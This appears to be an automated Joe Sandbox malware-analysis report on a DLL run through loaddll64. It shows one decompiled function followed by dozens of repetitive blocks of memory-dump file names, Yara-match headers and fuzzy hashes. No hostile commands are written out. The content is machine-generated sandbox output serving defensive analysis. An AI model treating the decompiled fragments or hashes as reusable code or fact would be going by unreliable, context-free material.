                                                                      				long long _t14;
                                                                      				intOrPtr _t41;
                                                                      				intOrPtr _t45;
                                                                      				signed long long _t60;
                                                                      				signed long long _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t63;
                                                                      				long long _t64;
                                                                      				signed long long _t65;
                                                                      				signed long long _t85;
                                                                      				signed long long* _t86;
                                                                      				void* _t87;
                                                                      				signed long long _t88;
                                                                      				void* _t98;
                                                                      
                                                                      				_t96 = __r10;
                                                                      				_t60 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_t61 = _t60 ^ _t88;
                                                                      				_v72 = _t61;
                                                                      				_t86 = _a40;
                                                                      				_t45 = r9d;
                                                                      				_t98 = __r8;
                                                                      				 *_t86 = _t85;
                                                                      				if (__edx != 1) goto 0x80054a15;
                                                                      				_v232 = 0x80;
                                                                      				r8d = _t45;
                                                                      				_t14 = E00000001180054774(__ecx, __edx - 1, _t63, __rcx, __r8, _t85, _t86, __r8,  &_v200, __r10);
                                                                      				_t64 = _t14;
                                                                      				if (_t14 == 0) goto 0x8005499d;
                                                                      				E00000001180042404(_t14, _t64, __r8, __r10);
                                                                      				 *_t86 = _t61;
                                                                      				E0000000118003F8F4(_t61, _t64);
                                                                      				if ( *_t86 == _t85) goto 0x80054a86;
                                                                      				_t6 = _t64 - 1; // -1
                                                                      				if (E00000001180052610(_t61, _t64,  *_t86, _t64, _t86,  &_v200, _t6) != 0) goto 0x80054aab;
                                                                      				goto 0x80054a89;
                                                                      				if (GetLastError() != 0x7a) goto 0x80054a86;
                                                                      				r9d = 0;
                                                                      				_v232 = 0;
                                                                      				r8d = _t45;
                                                                      				if (E00000001180054774(0, GetLastError() - 0x7a, _t64, __rcx, _t98, _t85, _t86,  &_v200, _t6, __r10) == 0) goto 0x80054a86;
                                                                      				E00000001180042404(_t21, _t21, _t98, __r10);
                                                                      				_t65 = _t61;
                                                                      				if (_t61 == 0) goto 0x80054a06;
                                                                      				_v232 = r15d;
                                                                      				r8d = _t45;
                                                                      				if (E00000001180054774(0, _t61, _t65, __rcx, _t98, _t85, _t86,  &_v200, _t61, __r10) == 0) goto 0x80054a06;
                                                                      				_t62 = _t65;
                                                                      				 *_t86 = _t62;
                                                                      				goto 0x80054a09;
                                                                      				E0000000118003F8F4(_t62, _t85);
                                                                      				goto 0x80054a89;
                                                                      				if (1 != 2) goto 0x80054a59;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				if (E000000011800475F0(_t45, 1 - 2, _t62, _t85, _t98, _t86, _t87,  &_v200) == 0) goto 0x80054a86;
                                                                      				E00000001180042404(_t26, _t26, _t98, _t96);
                                                                      				if (_t62 == 0) goto 0x80054a06;
                                                                      				r9d = r15d;
                                                                      				_t41 = _t45;
                                                                      				E000000011800475F0(_t41, _t62, _t62, _t62, _t98, _t86, _t87, _t62);
                                                                      				goto 0x800549f7;
                                                                      				if (_t41 != 0) goto 0x80054a86;
                                                                      				asm("bts ebp, 0x1d");
                                                                      				_v216 = 0xffffffff;
                                                                      				r9d = 2;
                                                                      				if (E000000011800475F0(_t45, _t41, _t62, _t62, _t98, _t86, _t87,  &_v216) == 0) goto 0x80054a86;
                                                                      				 *_t86 = _v216;
                                                                      				goto 0x80054996;
                                                                      				return E000000011800028F0(_v216 | 0xffffffff, 0, _v72 ^ _t88);
                                                                      			}

























                                                                      0x1800548f8
                                                                      0x18005490a
                                                                      0x180054911
                                                                      0x180054914
                                                                      0x18005491c
                                                                      0x180054926
                                                                      0x180054929
                                                                      0x18005492f
                                                                      0x180054935
                                                                      0x180054940
                                                                      0x180054948
                                                                      0x18005494e
                                                                      0x180054953
                                                                      0x180054958
                                                                      0x180054960
                                                                      0x180054967
                                                                      0x18005496a
                                                                      0x180054972
                                                                      0x18005497b
                                                                      0x180054990
                                                                      0x180054998
                                                                      0x1800549a6
                                                                      0x1800549ac
                                                                      0x1800549af
                                                                      0x1800549b3
                                                                      0x1800549c6
                                                                      0x1800549d4
                                                                      0x1800549d9
                                                                      0x1800549df
                                                                      0x1800549e4
                                                                      0x1800549e9
                                                                      0x1800549f9
                                                                      0x1800549fb
                                                                      0x180054a01
                                                                      0x180054a04
                                                                      0x180054a0c
                                                                      0x180054a13
                                                                      0x180054a1c
                                                                      0x180054a1e
                                                                      0x180054a21
                                                                      0x180054a33
                                                                      0x180054a3a
                                                                      0x180054a45
                                                                      0x180054a47
                                                                      0x180054a4d
                                                                      0x180054a52
                                                                      0x180054a57
                                                                      0x180054a5b
                                                                      0x180054a5d
                                                                      0x180054a61
                                                                      0x180054a6c
                                                                      0x180054a79
                                                                      0x180054a7f
                                                                      0x180054a81
                                                                      0x180054aaa

                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 000000018005499D
                                                                        • Part of subcall function 0000000180042404: RtlAllocateHeap.NTDLL(?,?,00000000,000000018003D1CA,?,?,?,0000000180013B21,?,?,?,?,000000018003F928), ref: 0000000180042459
                                                                        • Part of subcall function 000000018003F8F4: RtlDeleteBoundaryDescriptor.NTDLL ref: 000000018003F90A
                                                                        • Part of subcall function 000000018003F8F4: GetLastError.KERNEL32 ref: 000000018003F914
                                                                        • Part of subcall function 0000000180052610: _invalid_parameter_noinfo.LIBCMT ref: 0000000180052643
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$AllocateBoundaryDeleteDescriptorHeap_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4255177923-0
                                                                      • Opcode ID: 2212948e5e04e90042b662dfa80326f5f79311fcba216df6c5fd3c7472666429
                                                                      • Instruction ID: ca78092d9e7279d67b1ff0ee6b84806fb3d36e03269d009914ef178b6b070679
                                                                      • Opcode Fuzzy Hash: 2212948e5e04e90042b662dfa80326f5f79311fcba216df6c5fd3c7472666429
                                                                      • Instruction Fuzzy Hash: 2C41193230178942FAF29B2668417EAA284BB8D7C8F44D525BE495F782EE39C6098704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: i&
                                                                      • API String ID: 0-2605466503
                                                                      • Opcode ID: a7d6d7d4f4305a5d6465f18b8d33703bfb0f63f3c145402b07d6b5c29d0137f8
                                                                      • Instruction ID: b904136944e7a01c60604e475c15b4f4730081d2c29a453b7065cfddb03d58aa
                                                                      • Opcode Fuzzy Hash: a7d6d7d4f4305a5d6465f18b8d33703bfb0f63f3c145402b07d6b5c29d0137f8
                                                                      • Instruction Fuzzy Hash: 4771C2705487C9CBEBBACF28C889ADE7BF4FB58704F20061DD8998A2A0D7759645CF01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X
                                                                      • API String ID: 0-1684620495
                                                                      • Opcode ID: 5ce426e489b13cb5dd9426aa8df30c6c42626cb023b28a6060ff33400ea5f906
                                                                      • Instruction ID: aaec5998dc0d9fce59fdf1e4133fa9e38f628a9ba4137311ee3a5996bc4661a6
                                                                      • Opcode Fuzzy Hash: 5ce426e489b13cb5dd9426aa8df30c6c42626cb023b28a6060ff33400ea5f906
                                                                      • Instruction Fuzzy Hash: CC51D5B05187848BE3B4DF18D48579ABBE0FBC8354F108A2EE4CDD7290DBB49489CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9+
                                                                      • API String ID: 0-3823199749
                                                                      • Opcode ID: e5004ec9447b48b6b2b2e64993096ccc52ac2c1ab67b5753838425352e5e7704
                                                                      • Instruction ID: f412002fad598c664ecc49ddf6a182a458fcf1c5a01ac7d77874f3bfad1502d9
                                                                      • Opcode Fuzzy Hash: e5004ec9447b48b6b2b2e64993096ccc52ac2c1ab67b5753838425352e5e7704
                                                                      • Instruction Fuzzy Hash: 045136701487898BEBB9CF34DC997D936B4FB44304F94462AEC5E8A2D0DB748A4A8B01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: mLDM
                                                                      • API String ID: 0-233845578
                                                                      • Opcode ID: 9ed39a3ebaf21a008e9915a8c50dc8de05b6ca0952ece330c35f0bf9deb79a9c
                                                                      • Instruction ID: 2f6a33a050dac45226c0140c7898df36704dd579ab467d723dde4c7951085761
                                                                      • Opcode Fuzzy Hash: 9ed39a3ebaf21a008e9915a8c50dc8de05b6ca0952ece330c35f0bf9deb79a9c
                                                                      • Instruction Fuzzy Hash: 7A51F5B050074A8BDB4CDF68C99A5DE7BB1FB48348F104A1EEC6A9A350D3B4D664CBC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Sr
                                                                      • API String ID: 0-1849953400
                                                                      • Opcode ID: bc5cc8be020aac531251f012f5f0818ebb0a95d41355fb34dea15fd10ae4c8dc
                                                                      • Instruction ID: 0d2ec82cbe48d088613c74450ebf65f1248176bcea9fb66dc50346f76aa601e8
                                                                      • Opcode Fuzzy Hash: bc5cc8be020aac531251f012f5f0818ebb0a95d41355fb34dea15fd10ae4c8dc
                                                                      • Instruction Fuzzy Hash: 8051F87150438CAFDBB6CF24D8966CE7BA0FB49304F508619E94E8A290DFB45749DB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: N v
                                                                      • API String ID: 0-2321635733
                                                                      • Opcode ID: b650ad92336073f137fce11dd9c3fea444cfb32fd58793a4718e550cf076ad93
                                                                      • Instruction ID: 8ea3c46be7bdb737f8452db9407d5bce36eaaa35c18cb7a03811d84a6b5873b3
                                                                      • Opcode Fuzzy Hash: b650ad92336073f137fce11dd9c3fea444cfb32fd58793a4718e550cf076ad93
                                                                      • Instruction Fuzzy Hash: 8D51B2B190038E8FEB88CF64D8465DF7BB0FB14318F504A19FC6696260D3B4D665CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C
                                                                      • API String ID: 0-3756324736
                                                                      • Opcode ID: 85dbe61371a39a14d2b5f68baf98841251929ce4e5171eec6e278e483689c529
                                                                      • Instruction ID: b2325fc72b644572fd45887246a9ea24a8a7257ea4c40f329e2cb7fcf8332452
                                                                      • Opcode Fuzzy Hash: 85dbe61371a39a14d2b5f68baf98841251929ce4e5171eec6e278e483689c529
                                                                      • Instruction Fuzzy Hash: 5E4112B051CB008FC768DF29D48961ABBF0FB9A740F10491DFA89872A4D772D881CB83
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: UGF3
                                                                      • API String ID: 0-2981179996
                                                                      • Opcode ID: 00b9b430868b34ab203f780312004b7a3f9db38ffaf101cd1310d8c7c866cdd8
                                                                      • Instruction ID: d11c76fd5f2fb1ee6810358a868c9f6fb1b95171bd34540b655ef854d562b8a3
                                                                      • Opcode Fuzzy Hash: 00b9b430868b34ab203f780312004b7a3f9db38ffaf101cd1310d8c7c866cdd8
                                                                      • Instruction Fuzzy Hash: 7341D3B091038E8FDF48DF64D89A5DE7BB0FB18348F104A19EC66A6290D3B49665CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g
                                                                      • API String ID: 0-4085709437
                                                                      • Opcode ID: 8898bf0b88e1a617b0c0deae4cd3e28d815a61e1d8ecafa26f2e2136459dedd5
                                                                      • Instruction ID: 53cac182f02b87ef37d9d620aedeff0b5292f1bc9d375e4b2c8fa995ff86cc02
                                                                      • Opcode Fuzzy Hash: 8898bf0b88e1a617b0c0deae4cd3e28d815a61e1d8ecafa26f2e2136459dedd5
                                                                      • Instruction Fuzzy Hash: 9D3159702187448FC7A8DF28D08961ABBF0FB9A704F10496EFA99C7265D771CC04CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X
                                                                      • API String ID: 0-1684620495
                                                                      • Opcode ID: ffbff1e1a92d71a1fdbdc724ef034ba15b0b49349a706bcc6f59dbf7b3898b5a
                                                                      • Instruction ID: 081436207c55c3aa57843b187bc65e4b3a93fbd5f9c93596b3380e722928a94d
                                                                      • Opcode Fuzzy Hash: ffbff1e1a92d71a1fdbdc724ef034ba15b0b49349a706bcc6f59dbf7b3898b5a
                                                                      • Instruction Fuzzy Hash: 1B310A706187848FE378DF28D49979BBBE0FB89344F50891DE4C9C7255DBB48845CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: l$G-
                                                                      • API String ID: 0-2501377068
                                                                      • Opcode ID: 1ff0ed9846faa87bb5b27edab3e000699ee341b0e759c59366243617fcec0d8c
                                                                      • Instruction ID: 38329dfaa5f8efbe170cb0bb19f846562095f5dc0662d4c8c8c02e8cb809d77d
                                                                      • Opcode Fuzzy Hash: 1ff0ed9846faa87bb5b27edab3e000699ee341b0e759c59366243617fcec0d8c
                                                                      • Instruction Fuzzy Hash: A941B2B181074E8FDB45DF64D48A4CE7FB0FB28398F200619E855A6260D3B4D6A4CBC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: }f;|
                                                                      • API String ID: 0-2437595872
                                                                      • Opcode ID: 059d8a25e2aacdc38f03fa154f81eec481445a430154ce0fe971e9a978fb816b
                                                                      • Instruction ID: 615559c1ef9b6b4f9ef9d7235f2db2293c4a092ce71494bd7c694e90d1b40507
                                                                      • Opcode Fuzzy Hash: 059d8a25e2aacdc38f03fa154f81eec481445a430154ce0fe971e9a978fb816b
                                                                      • Instruction Fuzzy Hash: C241A2B181038E8FDF48CF68D88A5DE7BB1FB58358F110A19F865A6260D3B4D664CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :6
                                                                      • API String ID: 0-2882165023
                                                                      • Opcode ID: aa9f72429a5b87c164d356336b9cd2dff6fa43e72b1a2ec58e82fefcb8651bdb
                                                                      • Instruction ID: 740322d84372f0854c7166039b8833e26fa49cad7da4108c4c50f8b90de39d97
                                                                      • Opcode Fuzzy Hash: aa9f72429a5b87c164d356336b9cd2dff6fa43e72b1a2ec58e82fefcb8651bdb
                                                                      • Instruction Fuzzy Hash: 903171746187858BD70CDF28C15642EBBE1BB8C308F444B2DF4DAAA390D778A615CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .)4/
                                                                      • API String ID: 0-1187951824
                                                                      • Opcode ID: da802d97eeea30a3a1afcfaf8d49ed23e284d21ba55c848d778a22b692ba5156
                                                                      • Instruction ID: e48842921507fa4617b8fe4b156f0a5cbd0955dc34f26694229286ea33597962
                                                                      • Opcode Fuzzy Hash: da802d97eeea30a3a1afcfaf8d49ed23e284d21ba55c848d778a22b692ba5156
                                                                      • Instruction Fuzzy Hash: DC41E2B090078ECFDB48CF24C88A5DE7BB0FB58358F100A19F866A6250D7B8D665CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: m[
                                                                      • API String ID: 0-1176897218
                                                                      • Opcode ID: 152df2dcbee70cce799082e6bf2d8d8f242c1d73cee316818e31239bc9927954
                                                                      • Instruction ID: 5acc36e4af067b95920c4ee3953234f0e09f53154b8a3c6f70b09c811c65f60b
                                                                      • Opcode Fuzzy Hash: 152df2dcbee70cce799082e6bf2d8d8f242c1d73cee316818e31239bc9927954
                                                                      • Instruction Fuzzy Hash: C441C2B080030E8FDB44CF64D88A5CE7FB0FB68798F200219E859A6250D3B8D6A5CBD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: xy
                                                                      • API String ID: 0-578984673
                                                                      • Opcode ID: 17bb31bb362f2ad5c7fd4b4c81829862c7e83dde69708cc6da4fbf48af08600f
                                                                      • Instruction ID: 35e51ed8a8e96ec7560c4deb1ab4a4ab81e8ea7ebf0b506762b23c6e6126dda7
                                                                      • Opcode Fuzzy Hash: 17bb31bb362f2ad5c7fd4b4c81829862c7e83dde69708cc6da4fbf48af08600f
                                                                      • Instruction Fuzzy Hash: 6F317F715183818B9348DF28C49A52ABBE1FBCC318F905B1DF8CAA7390D778D6158F4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Gi
                                                                      • API String ID: 0-3398374081
                                                                      • Opcode ID: 84f01e1d7def73d404e7ca61d7a5f231940803648e3656356f541b1cda333d8e
                                                                      • Instruction ID: a432e400d53339b2be29782d5622c004e496e2654f793733c796eb02829025a1
                                                                      • Opcode Fuzzy Hash: 84f01e1d7def73d404e7ca61d7a5f231940803648e3656356f541b1cda333d8e
                                                                      • Instruction Fuzzy Hash: 5B3171B0529781ABD788DF28D49A81BBBE1FBC8304F806A2DF9868B250D774D445CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: |-
                                                                      • API String ID: 0-4231097972
                                                                      • Opcode ID: da09cdedbf386eb0e2753eee591904f0caa87d7abe42f1abcb7c903e67c98b86
                                                                      • Instruction ID: f4bcca97af8ad337045e3c8ac140f5163243ef5721515da4bca9d255a8ce233e
                                                                      • Opcode Fuzzy Hash: da09cdedbf386eb0e2753eee591904f0caa87d7abe42f1abcb7c903e67c98b86
                                                                      • Instruction Fuzzy Hash: F0318CB0528781AF8388DF28D48581BBBF1FBC8304F806A2EF886CB350D774D4458B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: cn
                                                                      • API String ID: 0-2768463556
                                                                      • Opcode ID: 063fab0ec49741693dbc52246f1fd37521c927aa368f954c1a048caf42092cd5
                                                                      • Instruction ID: 573a2d4e03848a85db0f12bd494b70e08c9189f54f2516819cd5935ea548453a
                                                                      • Opcode Fuzzy Hash: 063fab0ec49741693dbc52246f1fd37521c927aa368f954c1a048caf42092cd5
                                                                      • Instruction Fuzzy Hash: 5331A2B0529780AFD78CDF28D59691EBBE1FBC9344F806A2DF8868B390D7759405CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <l
                                                                      • API String ID: 0-1982744179
                                                                      • Opcode ID: 2db1177352cd73b0331f739891796cde75e0ec20f3aeb5d2f4af3d512a179367
                                                                      • Instruction ID: 8b8ea5d6e09e07b6056d2d273abf0fd72f6c37a7a22d9957cb21fe1b369ae7ae
                                                                      • Opcode Fuzzy Hash: 2db1177352cd73b0331f739891796cde75e0ec20f3aeb5d2f4af3d512a179367
                                                                      • Instruction Fuzzy Hash: B5317F70528780AFD388DF28D49981EBBE0FB99344F816A2EF9868B364D775D445CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4-
                                                                      • API String ID: 0-3207380349
                                                                      • Opcode ID: 4158c1f082f3f5a8b77e2afe5de94a8b0ae6d0ec855501ceef73a1a62d1632b4
                                                                      • Instruction ID: 16c0a164636ccce28980f9d24bcf0c8729a78ee771004a7449adb3eaaf0588b7
                                                                      • Opcode Fuzzy Hash: 4158c1f082f3f5a8b77e2afe5de94a8b0ae6d0ec855501ceef73a1a62d1632b4
                                                                      • Instruction Fuzzy Hash: 75319EB0629781AFD388DF28D58991ABBF1FBC9304F806A5DF9868B360D774D444CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :$b
                                                                      • API String ID: 0-2229885062
                                                                      • Opcode ID: e95da024e6af3800dbf6f15e382c37e4e83d4a1b2c4dd5c1b9d0615b67ba7242
                                                                      • Instruction ID: dfe3fb2b1801237f1af73118ca7dbe881fe34a1f54a472376f612d1b9644e1d5
                                                                      • Opcode Fuzzy Hash: e95da024e6af3800dbf6f15e382c37e4e83d4a1b2c4dd5c1b9d0615b67ba7242
                                                                      • Instruction Fuzzy Hash: 3B317AB45087858BD348DF28C45991AFBE1BB8C71CF404B2DF4CAAB3A0D7799645CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 3O?p
                                                                      • API String ID: 0-2965838254
                                                                      • Opcode ID: 642c6b271d9f67221fd54a17bf5ef0f93d401d9737cdb662ee2243f0f591abc0
                                                                      • Instruction ID: 09a78a9099cc3a21a3ba63a95d205c469000d303d50e42ea7873165f4155ce16
                                                                      • Opcode Fuzzy Hash: 642c6b271d9f67221fd54a17bf5ef0f93d401d9737cdb662ee2243f0f591abc0
                                                                      • Instruction Fuzzy Hash: 25315CB5529380AFD788DF28C48681BBBF1FBC9304F906A1DF8868A294D3B5D544CB47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
